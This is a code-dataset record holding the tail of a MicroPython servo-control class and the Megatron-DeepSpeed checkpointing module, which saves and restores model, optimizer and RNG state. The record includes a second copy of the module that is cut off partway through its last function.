        """Claim PWM channel 2 on G13 the first time it is needed."""
        if self.is_active:
            return
        self.is_active = True
        self.pwm_c = self.pwm.channel(2, pin='G13', duty_cycle=start_dc)
    def set_position(self, position):
        """Command the servo to `position` percent; return the duty cycle."""
        self.at_position = position
        duty = (position / 100.0) * (1 / 20) + (1 / 20)
        self.activate(start_dc=duty)
        self.pwm_c.duty_cycle(duty)
        return duty
    def wait_set_position(self, position):
        """Move to `position`, then sleep for the estimated travel time."""
        FULL_SWEEP_MS = 3000
        delta = abs(self.at_position - position)
        wait_ms = FULL_SWEEP_MS * delta / 100
        if delta != 0:
            wait_ms = min(int(wait_ms), 1500)
        self.set_position(position)
        time.sleep_ms(int(wait_ms))
    def shutdown(self):
        """Release G13 as a pulled-up input so the servo is left uncommanded."""
        self.pwm_off = Pin('G13', mode=Pin.IN, pull=Pin.PULL_UP)
        self.is_active = False
    def in_bin(self):
        """Preset: rotate over the bin."""
        self.wait_set_position(86)
    def out_bin(self):
        """Preset: rotate away from the bin in two small steps."""
        self.wait_set_position(12) # min diff seems to be 2
        self.wait_set_position(14)
    def dvd(self):
        """Preset: rotate to the DVD position."""
        self.wait_set_position(50)
| true | true |
f7328dcbb442c75712e43ef7b1e1e4a6045a4a4e | 18,431 | py | Python | megatron/checkpointing.py | adammoody/Megatron-DeepSpeed | 972211163608818fe9e5ba821246f18d0a5dc264 | [
"MIT"
] | null | null | null | megatron/checkpointing.py | adammoody/Megatron-DeepSpeed | 972211163608818fe9e5ba821246f18d0a5dc264 | [
"MIT"
] | null | null | null | megatron/checkpointing.py | adammoody/Megatron-DeepSpeed | 972211163608818fe9e5ba821246f18d0a5dc264 | [
"MIT"
] | null | null | null | # coding=utf-8
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Input/output checkpointing."""
import os
import random
import sys
import numpy as np
import torch
from megatron.global_vars import codecarbon_tracker_flush
from megatron import (get_args,
mpu,
print_rank_0,
update_num_microbatches,
utils)
_CHECKPOINT_VERSION = None
def set_checkpoint_version(value):
    """Record the checkpoint format version; repeated calls must agree."""
    global _CHECKPOINT_VERSION
    # The version may only ever be set to a single value per process.
    assert _CHECKPOINT_VERSION is None or _CHECKPOINT_VERSION == value, \
        "checkpoint versions do not match"
    _CHECKPOINT_VERSION = value
def get_checkpoint_version():
    """Return the checkpoint format version recorded by set_checkpoint_version
    (None when no checkpoint has been loaded or saved yet)."""
    global _CHECKPOINT_VERSION
    return _CHECKPOINT_VERSION
def check_checkpoint_args(checkpoint_args):
    """Assert that architecture-defining arguments stored in the checkpoint
    match the current run's input arguments."""
    args = get_args()
    def _compare(arg_name, old_arg_name=None):
        # Older checkpoints may store the value under a legacy name.
        source_name = old_arg_name if old_arg_name is not None else arg_name
        checkpoint_value = getattr(checkpoint_args, source_name)
        args_value = getattr(args, arg_name)
        assert checkpoint_value == args_value, (
            '{} value from checkpoint ({}) is not equal to the '
            'input argument value ({}).'.format(
                arg_name, checkpoint_value, args_value))
    for name in ('num_layers', 'hidden_size', 'num_attention_heads',
                 'max_position_embeddings', 'position_embedding_type'):
        _compare(name)
    # Vocabulary geometry is only fixed when a vocab file drives it.
    if args.vocab_file:
        for name in ('make_vocab_size_divisible_by', 'padded_vocab_size',
                     'tokenizer_type'):
            _compare(name)
    # The model-parallel argument was renamed at checkpoint version 3.0.
    if get_checkpoint_version() < 3.0:
        _compare('tensor_model_parallel_size',
                 old_arg_name='model_parallel_size')
    if get_checkpoint_version() >= 3.0:
        _compare('tensor_model_parallel_size')
        _compare('pipeline_model_parallel_size')
def ensure_directory_exists(filename):
    """Create filename's parent directory if it does not exist yet."""
    parent_dir = os.path.dirname(filename)
    if not os.path.exists(parent_dir):
        os.makedirs(parent_dir)
def get_checkpoint_name(checkpoints_path, iteration,
                        release=False):
    """Unified path of this rank's checkpoint file for `iteration`."""
    directory = 'release' if release else 'iter_{:07d}'.format(iteration)
    # The per-rank sub-directory encodes the tensor MP rank, plus the
    # pipeline MP rank whenever pipeline parallelism is in use.
    if mpu.get_pipeline_model_parallel_world_size() == 1:
        rank_dir = 'mp_rank_{:02d}'.format(
            mpu.get_tensor_model_parallel_rank())
    else:
        rank_dir = 'mp_rank_{:02d}_{:03d}'.format(
            mpu.get_tensor_model_parallel_rank(),
            mpu.get_pipeline_model_parallel_rank())
    return os.path.join(checkpoints_path, directory, rank_dir,
                        'model_optim_rng.pt')
def get_checkpoint_tracker_filename(checkpoints_path):
    """Path of the tracker file that records the latest checkpointed
    iteration so training can restart from it."""
    tracker = 'latest_checkpointed_iteration.txt'
    return os.path.join(checkpoints_path, tracker)
def save_checkpoint(iteration, model, optimizer, lr_scheduler):
    """Save a model checkpoint (native Megatron or DeepSpeed path), then have
    rank 0 update the tracker file so later runs can resume at `iteration`."""
    args = get_args()
    # Only rank zero of the data parallel writes to the disk.
    if not args.deepspeed:
        model = utils.unwrap_model(model)
    print_rank_0('saving checkpoint at iteration {:7d} to {}'.format(
        iteration, args.save))
    if not torch.distributed.is_initialized() or mpu.get_data_parallel_rank() == 0 \
            or args.deepspeed:
        # Arguments, iteration, and model.
        state_dict = {}
        state_dict['args'] = args
        state_dict['checkpoint_version'] = 3.0
        state_dict['iteration'] = iteration
        # DeepSpeed saves the model/optimizer/scheduler itself, so only the
        # native path serializes them into state_dict here.
        if not args.deepspeed:
            if len(model) == 1:
                state_dict['model'] = model[0].state_dict_for_save_checkpoint()
            else:
                # Interleaved (virtual) pipeline: one entry per model chunk.
                for i in range(len(model)):
                    mpu.set_virtual_pipeline_model_parallel_rank(i)
                    state_dict['model%d' % i] = model[i].state_dict_for_save_checkpoint()
            # Optimizer stuff.
            if not args.no_save_optim:
                if optimizer is not None:
                    state_dict['optimizer'] = optimizer.state_dict()
                if lr_scheduler is not None:
                    state_dict['lr_scheduler'] = lr_scheduler.state_dict()
        # RNG states.
        if not args.no_save_rng:
            state_dict['random_rng_state'] = random.getstate()
            state_dict['np_rng_state'] = np.random.get_state()
            state_dict['torch_rng_state'] = torch.get_rng_state()
            state_dict['cuda_rng_state'] = torch.cuda.get_rng_state()
            state_dict['rng_tracker_states'] \
                = mpu.get_cuda_rng_tracker().get_states()
        # Save.
        checkpoint_name = get_checkpoint_name(args.save, iteration)
        if not args.deepspeed:
            ensure_directory_exists(checkpoint_name)
            torch.save(state_dict, checkpoint_name)
    if args.deepspeed:
        # Saving is a collective communication: every rank must call it.
        checkpoint_name = get_checkpoint_name(args.save, iteration)
        # Trim off the filename and mp_rank_* directory.
        for _ in range(3):
            checkpoint_name = os.path.dirname(checkpoint_name)
        model[0].save_checkpoint(checkpoint_name, client_state=state_dict)
    # Wait so everyone is done (necessary)
    if torch.distributed.is_initialized():
        torch.distributed.barrier()
    print_rank_0('  successfully saved checkpoint at iteration {:7d} to {}'.format(
        iteration, args.save))
    # And update the latest iteration
    if not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0:
        tracker_filename = get_checkpoint_tracker_filename(args.save)
        with open(tracker_filename, 'w') as f:
            f.write(str(iteration))
    # Wait so everyone is done (not necessary)
    if torch.distributed.is_initialized():
        torch.distributed.barrier()
    # since the code can be exited or aborted in various places we use the checkpoint saving as
    # a safe saving point for the codecarbon tracker. If the program doesn't run to its normal
    # end, then only the data since the last saved checkpoint will be lost.
    codecarbon_tracker_flush()
def _transpose_first_dim(t, num_splits, num_splits_first, model):
    """Reorder t's leading fused (QKV/KV) dimension between split-major and
    head-major layouts; np (heads per partition) and hn (hidden per head)
    are read from the model's first self-attention layer."""
    input_shape = t.size()
    # We use a self_attention module but the values extracted aren't
    # specific to self attention so should work for cross attention as well
    while hasattr(model, 'module'):
        model = model.module
    attention_module = model.language_model.encoder.layers[0].self_attention
    hidden_size_per_attention_head = attention_module.hidden_size_per_attention_head
    num_attention_heads_per_partition = attention_module.num_attention_heads_per_partition
    if num_splits_first:
        """[num_splits * np * hn, h]
        -->(view) [num_splits, np, hn, h]
        -->(tranpose) [np, num_splits, hn, h]
        -->(view) [np * num_splits * hn, h] """
        intermediate_shape = \
            (num_splits, num_attention_heads_per_partition,
             hidden_size_per_attention_head) + input_shape[1:]
        t = t.view(*intermediate_shape)
        t = t.transpose(0, 1).contiguous()
    else:
        """[np * hn * num_splits, h]
        -->(view) [np, hn, num_splits, h]
        -->(tranpose) [np, num_splits, hn, h]
        -->(view) [np * num_splits * hn, h] """
        intermediate_shape = \
            (num_attention_heads_per_partition,
             hidden_size_per_attention_head, num_splits) +\
            input_shape[1:]
        t = t.view(*intermediate_shape)
        t = t.transpose(1, 2).contiguous()
    t = t.view(*input_shape)
    return t
def fix_query_key_value_ordering(model, checkpoint_version):
    """Fix up query/key/value matrix ordering for checkpoints written with a
    format version older than 2.0."""
    if checkpoint_version >= 2.0:
        return
    if isinstance(model, list):
        assert len(model) == 1
        model = model[0]
    # Fused QKV parameters hold 3 splits, fused KV parameters hold 2.
    for name, param in model.named_parameters():
        if name.endswith(('.query_key_value.weight', '.query_key_value.bias')):
            num_splits = 3
        elif name.endswith(('.key_value.weight', '.key_value.bias')):
            num_splits = 2
        else:
            continue
        if checkpoint_version == 0:
            fixed_param = _transpose_first_dim(param.data, num_splits, True, model)
        elif checkpoint_version == 1.0:
            fixed_param = _transpose_first_dim(param.data, num_splits, False, model)
        else:
            print_rank_0(f"Invalid checkpoint version {checkpoint_version}.")
            sys.exit()
        param.data.copy_(fixed_param)
    print_rank_0(" succesfully fixed query-key-values ordering for"
                 " checkpoint version {}".format(checkpoint_version))
def load_checkpoint(model, optimizer, lr_scheduler, load_arg='load', strict=True):
    """Load a model checkpoint and return the iteration.
    strict (bool): whether to strictly enforce that the keys in
        :attr:`state_dict` of the checkpoint match the names of
        parameters and buffers in model.
    Returns 0 when no checkpoint is found, when fine-tuning, or when loading
    a 'release' checkpoint.
    """
    args = get_args()
    load_dir = getattr(args, load_arg)
    if args.deepspeed:
        # DeepSpeed locates and loads its own checkpoint layout.
        loaded_dir, state_dict = model[0].load_checkpoint(load_dir)
        if loaded_dir is None:
            print_rank_0('WARNING: could not find the metadata file {} '.format(
                load_dir))
            print_rank_0('    will not load any checkpoints and will start from '
                         'random')
            return 0
        release = False
    else:
        model = utils.unwrap_model(model)
        # Read the tracker file and set the iteration.
        tracker_filename = get_checkpoint_tracker_filename(load_dir)
        # If no tracker file, return iteration zero.
        if not os.path.isfile(tracker_filename):
            print_rank_0('WARNING: could not find the metadata file {} '.format(
                tracker_filename))
            print_rank_0('    will not load any checkpoints and will start from '
                         'random')
            return 0
        # Otherwise, read the tracker file and either set the iteration or
        # mark it as a release checkpoint.
        iteration = 0
        release = False
        with open(tracker_filename, 'r') as f:
            metastring = f.read().strip()
            try:
                iteration = int(metastring)
            except ValueError:
                release = metastring == 'release'
                if not release:
                    print_rank_0('ERROR: Invalid metadata file {}. Exiting'.format(
                        tracker_filename))
                    sys.exit()
        assert iteration > 0 or release, 'error parsing metadata file {}'.format(
            tracker_filename)
        # Checkpoint.
        checkpoint_name = get_checkpoint_name(load_dir, iteration, release)
        print_rank_0(f' loading checkpoint from {args.load} at iteration {iteration}')
        # Load the checkpoint.
        try:
            state_dict = torch.load(checkpoint_name, map_location='cpu')
        except ModuleNotFoundError:
            from megatron.fp16_deprecated import loss_scaler
            # For backward compatibility: alias the deprecated module paths so
            # old pickled checkpoints that reference them can be deserialized.
            print_rank_0(' > deserializing using the old code structure ...')
            sys.modules['fp16.loss_scaler'] = sys.modules[
                'megatron.fp16_deprecated.loss_scaler']
            sys.modules['megatron.fp16.loss_scaler'] = sys.modules[
                'megatron.fp16_deprecated.loss_scaler']
            state_dict = torch.load(checkpoint_name, map_location='cpu')
            sys.modules.pop('fp16.loss_scaler', None)
            sys.modules.pop('megatron.fp16.loss_scaler', None)
        except BaseException as e:
            print_rank_0('could not load the checkpoint')
            print_rank_0(e)
            sys.exit()
    # set checkpoint version
    set_checkpoint_version(state_dict.get('checkpoint_version', 0))
    # Set iteration.
    if args.finetune or release:
        iteration = 0
    else:
        try:
            iteration = state_dict['iteration']
        except KeyError:
            try: # Backward compatible with older checkpoints
                iteration = state_dict['total_iters']
            except KeyError:
                print_rank_0('A metadata file exists but unable to load '
                             'iteration from checkpoint {}, exiting'.format(
                                 checkpoint_name))
                sys.exit()
    # Check arguments.
    assert args.consumed_train_samples == 0
    assert args.consumed_valid_samples == 0
    if 'args' in state_dict:
        checkpoint_args = state_dict['args']
        check_checkpoint_args(checkpoint_args)
        args.consumed_train_samples = getattr(checkpoint_args,
                                              'consumed_train_samples', 0)
        update_num_microbatches(consumed_samples=args.consumed_train_samples)
        args.consumed_valid_samples = getattr(checkpoint_args,
                                              'consumed_valid_samples', 0)
    else:
        print_rank_0('could not find arguments in the checkpoint ...')
    # Model.  (The DeepSpeed engine already restored its own model weights.)
    if not args.deepspeed:
        if len(model) == 1:
            model[0].load_state_dict(state_dict['model'], strict=strict)
        else:
            for i in range(len(model)):
                mpu.set_virtual_pipeline_model_parallel_rank(i)
                model[i].load_state_dict(state_dict['model%d' % i], strict=strict)
    # Fix up query/key/value matrix ordering if needed
    checkpoint_version = get_checkpoint_version()
    print_rank_0(f' checkpoint version {checkpoint_version}')
    fix_query_key_value_ordering(model, checkpoint_version)
    # Optimizer.
    if not args.deepspeed:
        if not release and not args.finetune and not args.no_load_optim:
            try:
                if optimizer is not None:
                    optimizer.load_state_dict(state_dict['optimizer'])
                if lr_scheduler is not None:
                    lr_scheduler.load_state_dict(state_dict['lr_scheduler'])
            except KeyError:
                print_rank_0('Unable to load optimizer from checkpoint {}. '
                             'Specify --no-load-optim or --finetune to prevent '
                             'attempting to load the optimizer state, '
                             'exiting ...'.format(checkpoint_name))
                sys.exit()
    # rng states.
    if not release and not args.finetune and not args.no_load_rng:
        try:
            random.setstate(state_dict['random_rng_state'])
            np.random.set_state(state_dict['np_rng_state'])
            torch.set_rng_state(state_dict['torch_rng_state'])
            torch.cuda.set_rng_state(state_dict['cuda_rng_state'])
            # Check for empty states array
            if not state_dict['rng_tracker_states']:
                raise KeyError
            mpu.get_cuda_rng_tracker().set_states(
                state_dict['rng_tracker_states'])
        except KeyError:
            print_rank_0('Unable to load rng state from checkpoint {}. '
                         'Specify --no-load-rng or --finetune to prevent '
                         'attempting to load the rng state, '
                         'exiting ...'.format(checkpoint_name))
            sys.exit()
    # Some utilities want to load a checkpoint without distributed being initialized
    if torch.distributed.is_initialized():
        torch.distributed.barrier()
    print_rank_0(f'  successfully loaded checkpoint from {args.load} '
                 f'at iteration {iteration}')
    return iteration
def load_biencoder_checkpoint(model, only_query_model=False,
                              only_context_model=False, custom_load_path=None):
    """Selectively load a biencoder (retrieval) checkpoint for indexing or
    retrieving, optionally keeping only the query or context sub-model."""
    args = get_args()
    model = utils.unwrap_model(model)
    load_path = args.load if custom_load_path is None else custom_load_path
    # The tracker file holds the latest checkpointed iteration number.
    with open(get_checkpoint_tracker_filename(load_path), 'r') as f:
        iteration = int(f.read().strip())
    checkpoint_name = get_checkpoint_name(load_path, iteration, False)
    if mpu.get_data_parallel_rank() == 0:
        print('global rank {} is loading checkpoint {}'.format(
            torch.distributed.get_rank(), checkpoint_name))
    state_dict = torch.load(checkpoint_name, map_location='cpu')
    ret_state_dict = state_dict['model']
    # Drop the half that was not requested.
    if only_query_model:
        ret_state_dict.pop('context_model')
    if only_context_model:
        ret_state_dict.pop('query_model')
    assert len(model) == 1
    model[0].load_state_dict(ret_state_dict)
    torch.distributed.barrier()
    if mpu.get_data_parallel_rank() == 0:
        print(' successfully loaded {}'.format(checkpoint_name))
    return model
| 39.980477 | 95 | 0.629646 |
import os
import random
import sys
import numpy as np
import torch
from megatron.global_vars import codecarbon_tracker_flush
from megatron import (get_args,
mpu,
print_rank_0,
update_num_microbatches,
utils)
_CHECKPOINT_VERSION = None
def set_checkpoint_version(value):
    """Record the checkpoint format version; it may only be set to one value."""
    global _CHECKPOINT_VERSION
    assert _CHECKPOINT_VERSION is None or _CHECKPOINT_VERSION == value, \
        "checkpoint versions do not match"
    _CHECKPOINT_VERSION = value
def get_checkpoint_version():
    """Return the recorded checkpoint format version (None when unset)."""
    global _CHECKPOINT_VERSION
    return _CHECKPOINT_VERSION
def check_checkpoint_args(checkpoint_args):
    """Assert that the checkpoint's architecture-defining arguments match the
    current run's input arguments."""
    args = get_args()
    def _compare(arg_name, old_arg_name=None):
        # Legacy checkpoints may store the value under an older name.
        source_name = old_arg_name if old_arg_name is not None else arg_name
        checkpoint_value = getattr(checkpoint_args, source_name)
        args_value = getattr(args, arg_name)
        assert checkpoint_value == args_value, (
            '{} value from checkpoint ({}) is not equal to the '
            'input argument value ({}).'.format(
                arg_name, checkpoint_value, args_value))
    for name in ('num_layers', 'hidden_size', 'num_attention_heads',
                 'max_position_embeddings', 'position_embedding_type'):
        _compare(name)
    if args.vocab_file:
        for name in ('make_vocab_size_divisible_by', 'padded_vocab_size',
                     'tokenizer_type'):
            _compare(name)
    # The model-parallel argument was renamed at checkpoint version 3.0.
    if get_checkpoint_version() < 3.0:
        _compare('tensor_model_parallel_size',
                 old_arg_name='model_parallel_size')
    if get_checkpoint_version() >= 3.0:
        _compare('tensor_model_parallel_size')
        _compare('pipeline_model_parallel_size')
def ensure_directory_exists(filename):
    """Make sure filename's parent directory exists, creating it if needed."""
    parent_dir = os.path.dirname(filename)
    if not os.path.exists(parent_dir):
        os.makedirs(parent_dir)
def get_checkpoint_name(checkpoints_path, iteration,
                        release=False):
    """Unified path of this rank's checkpoint file for `iteration`."""
    directory = 'release' if release else 'iter_{:07d}'.format(iteration)
    # Per-rank sub-directory: tensor MP rank, plus pipeline MP rank when
    # pipeline parallelism is active.
    if mpu.get_pipeline_model_parallel_world_size() == 1:
        rank_dir = 'mp_rank_{:02d}'.format(
            mpu.get_tensor_model_parallel_rank())
    else:
        rank_dir = 'mp_rank_{:02d}_{:03d}'.format(
            mpu.get_tensor_model_parallel_rank(),
            mpu.get_pipeline_model_parallel_rank())
    return os.path.join(checkpoints_path, directory, rank_dir,
                        'model_optim_rng.pt')
def get_checkpoint_tracker_filename(checkpoints_path):
    """Path of the tracker file recording the latest checkpointed iteration."""
    tracker = 'latest_checkpointed_iteration.txt'
    return os.path.join(checkpoints_path, tracker)
def save_checkpoint(iteration, model, optimizer, lr_scheduler):
    """Save model, optimizer, scheduler and RNG state for *iteration*.

    Only data-parallel rank 0 writes the state dict (every rank writes when
    DeepSpeed handles checkpointing); global rank 0 then updates the tracker
    file after a barrier so readers never see a tracker pointing at a
    half-written checkpoint.
    """
    args = get_args()
    if not args.deepspeed:
        # DeepSpeed expects the wrapped model; otherwise unwrap DDP/Float16 wrappers.
        model = utils.unwrap_model(model)
    print_rank_0('saving checkpoint at iteration {:7d} to {}'.format(
        iteration, args.save))
    # Collect the state dict on data-parallel rank 0 (or on every rank for DeepSpeed).
    if not torch.distributed.is_initialized() or mpu.get_data_parallel_rank() == 0 \
            or args.deepspeed:
        state_dict = {}
        state_dict['args'] = args
        state_dict['checkpoint_version'] = 3.0
        state_dict['iteration'] = iteration
        if not args.deepspeed:
            if len(model) == 1:
                state_dict['model'] = model[0].state_dict_for_save_checkpoint()
            else:
                # Interleaved pipeline schedule: one model chunk per virtual rank.
                for i in range(len(model)):
                    mpu.set_virtual_pipeline_model_parallel_rank(i)
                    state_dict['model%d' % i] = model[i].state_dict_for_save_checkpoint()
        # Optimizer / LR-scheduler state (optional).
        if not args.no_save_optim:
            if optimizer is not None:
                state_dict['optimizer'] = optimizer.state_dict()
            if lr_scheduler is not None:
                state_dict['lr_scheduler'] = lr_scheduler.state_dict()
        # RNG states so a resumed run reproduces the same random streams.
        if not args.no_save_rng:
            state_dict['random_rng_state'] = random.getstate()
            state_dict['np_rng_state'] = np.random.get_state()
            state_dict['torch_rng_state'] = torch.get_rng_state()
            state_dict['cuda_rng_state'] = torch.cuda.get_rng_state()
            state_dict['rng_tracker_states'] \
                = mpu.get_cuda_rng_tracker().get_states()
        checkpoint_name = get_checkpoint_name(args.save, iteration)
        if not args.deepspeed:
            ensure_directory_exists(checkpoint_name)
            torch.save(state_dict, checkpoint_name)
    if args.deepspeed:
        checkpoint_name = get_checkpoint_name(args.save, iteration)
        # Strip the three trailing path components (file, rank dir, iter dir):
        # DeepSpeed manages its own directory layout under the save root.
        for _ in range(3):
            checkpoint_name = os.path.dirname(checkpoint_name)
        model[0].save_checkpoint(checkpoint_name, client_state=state_dict)
    # Wait so all ranks are done before anyone declares success.
    if torch.distributed.is_initialized():
        torch.distributed.barrier()
    print_rank_0('  successfully saved checkpoint at iteration {:7d} to {}'.format(
        iteration, args.save))
    # Only global rank 0 updates the tracker file.
    if not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0:
        tracker_filename = get_checkpoint_tracker_filename(args.save)
        with open(tracker_filename, 'w') as f:
            f.write(str(iteration))
    # Wait so all ranks know the tracker file has been updated.
    if torch.distributed.is_initialized():
        torch.distributed.barrier()
    # Flush the emissions tracker now: if the job is killed before the next
    # flush, only the data since this checkpoint will be lost.
    codecarbon_tracker_flush()
def _transpose_first_dim(t, num_splits, num_splits_first, model):
    """Reorder the first dimension of a fused QKV parameter tensor.

    ``num_splits`` is the number of fused projections (3 for QKV, 2 for KV);
    ``num_splits_first`` selects which legacy layout the tensor is in.
    Returns a tensor with the same shape but the first dimension permuted to
    the current [np * num_splits * hn, h] ordering.
    """
    input_shape = t.size()
    # We use a self_attention module only to read the per-partition head
    # geometry (head size and head count); nothing attention-specific is used.
    while hasattr(model, 'module'):
        model = model.module
    attention_module = model.language_model.encoder.layers[0].self_attention
    hidden_size_per_attention_head = attention_module.hidden_size_per_attention_head
    num_attention_heads_per_partition = attention_module.num_attention_heads_per_partition
    if num_splits_first:
        # [num_splits * np * hn, h] -> view -> transpose(0,1) -> flatten back.
        intermediate_shape = \
            (num_splits, num_attention_heads_per_partition,
             hidden_size_per_attention_head) + input_shape[1:]
        t = t.view(*intermediate_shape)
        t = t.transpose(0, 1).contiguous()
    else:
        """[np * hn * num_splits, h]
        -->(view) [np, hn, num_splits, h]
        -->(tranpose) [np, num_splits, hn, h]
        -->(view) [np * num_splits * hn, h] """
        intermediate_shape = \
            (num_attention_heads_per_partition,
             hidden_size_per_attention_head, num_splits) +\
            input_shape[1:]
        t = t.view(*intermediate_shape)
        t = t.transpose(1, 2).contiguous()
    t = t.view(*input_shape)
    return t
def fix_query_key_value_ordering(model, checkpoint_version):
    """Fix the fused QKV parameter layout of pre-2.0 checkpoints in place.

    Checkpoint version 0 stored the splits first, version 1.0 stored them
    last; both are permuted to the current [np * num_splits * hn, h] order.
    Versions >= 2.0 need no fixing, so the function is a no-op then.
    """
    if checkpoint_version < 2.0:
        if isinstance(model, list):
            assert len(model)==1
            model = model[0]
        for name, param in model.named_parameters():
            # Fused query/key/value projection: 3 interleaved splits.
            if name.endswith(('.query_key_value.weight', '.query_key_value.bias')):
                if checkpoint_version == 0:
                    fixed_param = _transpose_first_dim(param.data, 3, True, model)
                elif checkpoint_version == 1.0:
                    fixed_param = _transpose_first_dim(param.data, 3, False, model)
                else:
                    print_rank_0(f"Invalid checkpoint version {checkpoint_version}.")
                    sys.exit()
                param.data.copy_(fixed_param)
            # Fused key/value projection (cross attention): 2 interleaved splits.
            if name.endswith(('.key_value.weight', '.key_value.bias')):
                if checkpoint_version == 0:
                    fixed_param = _transpose_first_dim(param.data, 2, True, model)
                elif checkpoint_version == 1.0:
                    fixed_param = _transpose_first_dim(param.data, 2, False, model)
                else:
                    print_rank_0(f"Invalid checkpoint version {checkpoint_version}.")
                    sys.exit()
                param.data.copy_(fixed_param)
        # Typo fix: message previously read "succesfully".
        print_rank_0(" successfully fixed query-key-values ordering for"
                     " checkpoint version {}".format(checkpoint_version))
def load_checkpoint(model, optimizer, lr_scheduler, load_arg='load', strict=True):
    """Load a checkpoint and return the iteration to resume from (0 if none).

    DeepSpeed runs delegate loading to the engine; otherwise the tracker file
    under ``getattr(args, load_arg)`` selects the iteration (or 'release')
    and the per-rank state dict is read with torch.load. Optimizer, scheduler
    and RNG states are restored unless --finetune / --no-load-* disable it.
    """
    args = get_args()
    load_dir = getattr(args, load_arg)
    if args.deepspeed:
        loaded_dir, state_dict = model[0].load_checkpoint(load_dir)
        if loaded_dir is None:
            print_rank_0('WARNING: could not find the metadata file {} '.format(
                load_dir))
            print_rank_0('    will not load any checkpoints and will start from '
                         'random')
            return 0
        release = False
    else:
        model = utils.unwrap_model(model)
        # The tracker file records the last full checkpointed iteration.
        tracker_filename = get_checkpoint_tracker_filename(load_dir)
        # Missing tracker file => start from random initialization.
        if not os.path.isfile(tracker_filename):
            print_rank_0('WARNING: could not find the metadata file {} '.format(
                tracker_filename))
            print_rank_0('    will not load any checkpoints and will start from '
                         'random')
            return 0
        iteration = 0
        release = False
        with open(tracker_filename, 'r') as f:
            metastring = f.read().strip()
            try:
                iteration = int(metastring)
            except ValueError:
                # Not an integer: the only other legal content is 'release'.
                release = metastring == 'release'
                if not release:
                    print_rank_0('ERROR: Invalid metadata file {}. Exiting'.format(
                        tracker_filename))
                    sys.exit()
        assert iteration > 0 or release, 'error parsing metadata file {}'.format(
            tracker_filename)
        checkpoint_name = get_checkpoint_name(load_dir, iteration, release)
        print_rank_0(f' loading checkpoint from {args.load} at iteration {iteration}')
        # Load to CPU to avoid GPU OOM during deserialization.
        try:
            state_dict = torch.load(checkpoint_name, map_location='cpu')
        except ModuleNotFoundError:
            # Old checkpoints pickled the removed fp16 loss scaler module;
            # alias it to the deprecated shim so unpickling succeeds.
            from megatron.fp16_deprecated import loss_scaler
            print_rank_0(' > deserializing using the old code structure ...')
            sys.modules['fp16.loss_scaler'] = sys.modules[
                'megatron.fp16_deprecated.loss_scaler']
            sys.modules['megatron.fp16.loss_scaler'] = sys.modules[
                'megatron.fp16_deprecated.loss_scaler']
            state_dict = torch.load(checkpoint_name, map_location='cpu')
            sys.modules.pop('fp16.loss_scaler', None)
            sys.modules.pop('megatron.fp16.loss_scaler', None)
        except BaseException as e:
            print_rank_0('could not load the checkpoint')
            print_rank_0(e)
            sys.exit()
    # Record the checkpoint format version (0 for very old checkpoints).
    set_checkpoint_version(state_dict.get('checkpoint_version', 0))
    # Fine-tuning or a release checkpoint restarts iteration counting.
    if args.finetune or release:
        iteration = 0
    else:
        try:
            iteration = state_dict['iteration']
        except KeyError:
            try:
                # Backward compatible with older checkpoint key name.
                iteration = state_dict['total_iters']
            except KeyError:
                print_rank_0('A metadata file exists but unable to load '
                             'iteration from checkpoint {}, exiting'.format(
                                 checkpoint_name))
                sys.exit()
    # Consumed-sample counters must not have been set before loading.
    assert args.consumed_train_samples == 0
    assert args.consumed_valid_samples == 0
    if 'args' in state_dict:
        checkpoint_args = state_dict['args']
        check_checkpoint_args(checkpoint_args)
        args.consumed_train_samples = getattr(checkpoint_args,
                                              'consumed_train_samples', 0)
        update_num_microbatches(consumed_samples=args.consumed_train_samples)
        args.consumed_valid_samples = getattr(checkpoint_args,
                                              'consumed_valid_samples', 0)
    else:
        print_rank_0('could not find arguments in the checkpoint ...')
    # Model weights (DeepSpeed already loaded them via the engine).
    if not args.deepspeed:
        if len(model) == 1:
            model[0].load_state_dict(state_dict['model'], strict=strict)
        else:
            for i in range(len(model)):
                mpu.set_virtual_pipeline_model_parallel_rank(i)
                model[i].load_state_dict(state_dict['model%d' % i], strict=strict)
    checkpoint_version = get_checkpoint_version()
    print_rank_0(f' checkpoint version {checkpoint_version}')
    # Older checkpoints stored fused QKV parameters in a different ordering.
    fix_query_key_value_ordering(model, checkpoint_version)
    # Optimizer / LR-scheduler state.
    if not args.deepspeed:
        if not release and not args.finetune and not args.no_load_optim:
            try:
                if optimizer is not None:
                    optimizer.load_state_dict(state_dict['optimizer'])
                if lr_scheduler is not None:
                    lr_scheduler.load_state_dict(state_dict['lr_scheduler'])
            except KeyError:
                print_rank_0('Unable to load optimizer from checkpoint {}. '
                             'Specify --no-load-optim or --finetune to prevent '
                             'attempting to load the optimizer state, '
                             'exiting ...'.format(checkpoint_name))
                sys.exit()
    # RNG states (NOTE(review): in the DeepSpeed path ``checkpoint_name`` is
    # never assigned, so this error message would raise NameError — verify).
    if not release and not args.finetune and not args.no_load_rng:
        try:
            random.setstate(state_dict['random_rng_state'])
            np.random.set_state(state_dict['np_rng_state'])
            torch.set_rng_state(state_dict['torch_rng_state'])
            torch.cuda.set_rng_state(state_dict['cuda_rng_state'])
            # An empty tracker-state dict is treated the same as a missing one.
            if not state_dict['rng_tracker_states']:
                raise KeyError
            mpu.get_cuda_rng_tracker().set_states(
                state_dict['rng_tracker_states'])
        except KeyError:
            print_rank_0('Unable to load rng state from checkpoint {}. '
                         'Specify --no-load-rng or --finetune to prevent '
                         'attempting to load the rng state, '
                         'exiting ...'.format(checkpoint_name))
            sys.exit()
    # Make sure all ranks finished loading before proceeding.
    if torch.distributed.is_initialized():
        torch.distributed.barrier()
    print_rank_0(f'  successfully loaded checkpoint from {args.load} '
                 f'at iteration {iteration}')
    return iteration
def load_biencoder_checkpoint(model, only_query_model=False,
                              only_context_model=False, custom_load_path=None):
    """Load a biencoder (query/context towers) checkpoint into *model*.

    ``only_query_model`` / ``only_context_model`` drop the other tower's
    weights from the state dict before loading. ``custom_load_path``
    overrides ``args.load``. Returns the (unwrapped) model list.
    """
    args = get_args()
    model = utils.unwrap_model(model)
